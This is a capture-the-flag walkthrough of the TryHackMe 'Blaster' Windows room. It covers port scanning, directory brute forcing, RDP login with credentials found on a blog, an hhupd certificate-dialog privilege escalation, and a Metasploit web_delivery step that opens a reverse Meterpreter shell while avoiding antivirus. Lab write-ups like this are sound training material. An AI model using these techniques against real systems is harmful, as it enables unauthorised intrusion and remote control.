TryHackMe: Blaster

Walkthrough

Hi folks, today we are doing Tryhackme Blaster, which a windows machine rated as Easy.

Initials

export IP=10.10.184.13

Enumerations:

Let’s start with port scanning, Now what I like to do is perform rustscan for getting open ports.

rustscan -a $Ip --ulimit 5000

Now transfer these ports to nmap

nmap -T4 -sC -sV -p80,3389 -oN nmap $IP -Pn

The results are

nmap_results.png

So we found 2 open ports i.e. 80 (http) and 3389 (RDP)

I checked for port 80 (http) coz we don’t have any credentials for RDP.

http://$IP

normal webpage, then I went for directory brute forcing, And found /retro

feroxbuster -u http://$IP -o feroscan.txt

feroxbuster_scan.png

Upon visiting,

So this we some kinda blogging website. While checking the blogs, we found the user had commented password on of the blog.

username_and_passowrd

User.txt

Now time to get user.txt. login via RDP service, in Windows you can use rdp and in linux there are many tools but I prefer rdesktop

rdesktop $IP -g 50%

And at desktop, we got the user flag

userflag.png

PrivEsc:

For getting meterpreter shell, I tried some msfvenom payloads, but the AV is deleting the file. But at desktop, there was another file with user.txt named hhupd

hhupd.png

googled it, and found one exploit, which allows normal user to run cmd as admin.

This video will help you in better understanding (:

Now time for Escalating Privileges.

Run the hhupd application as administrator, and check the publisher certificate.

publisher certificate.png

Now click on the link and a webpage will open. Save the webpage (ignore the error of internet not working)

CRTL+S

navigate to cmd.exe or simply run cmd at top

navigate to cmd

Hit enter and cmd will be opened as Admin

admin cmd

Now get the admin flag

admin flag

Post Exploitation:

So there are some post exploitation also, let’s do that too.

Since the AV is enabled, we cannot get admin shell via msfvenom.

Now we can use Web Delivery, it a metasploit module for getting shell from shell (kidna :p)

msf> use exploit/multi/script/web_delivery

we will use paylaod as normal

windows/meterpreter/reverse_tcp

And set the target as poweershell as we are getting shell as powershell

set the other details such as LHOST, LPORT, etc. Now we are good to go.

Run the exploit and copy the result

web delivery result

paste this on windows admin cmd.

if copy pasting not working from your system to RDP, then you can save it on local machine and host it using python server. Then copy and paste from RDP

and we got the Admin meterpreter shell

meterpreter shell

So with this, we have successfully exploited Blaster. Thanks for reading this, hope you find this useful. For any doubt you can DM on twitter

Bye and I’ll see you in the nxt blog

|| ROOM || TWITTER ||